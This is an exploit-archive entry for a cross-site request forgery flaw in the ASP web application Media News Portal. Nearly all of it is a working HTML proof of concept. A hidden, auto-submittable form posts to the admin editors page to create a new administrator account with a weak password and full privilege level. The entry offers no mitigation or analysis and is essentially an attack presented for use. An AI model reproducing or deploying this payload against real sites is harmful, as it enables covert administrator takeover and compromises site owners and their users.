Media News Portal CSRF Vulnerability (Add Admin)

2012-05-13T00:00:00
ID 1337DAY-ID-18252
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-05-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Media News Portal CSRF Vulnerability (Add Admin)
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.gazatem.com/Products/medianewsportal.asp
####################################################################
===[ Exploit ]===
<html>
<head>
<title>Media News Portal [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/editors.asp">
<input type="hidden" name="editorName" value="Admin"/>
<input type="hidden" name="editorEmail" value="[email protected]"/>
<input type="hidden" name="psw1" value="123456"/>
<input type="hidden" name="psw2" value="123456"/>
<input type="hidden" name="passLevel" value="1"/>
<input type="hidden" name="func" value="Add User"/>
</form>
</body>
</html>
####################################################################



#  0day.today [2018-04-02]  #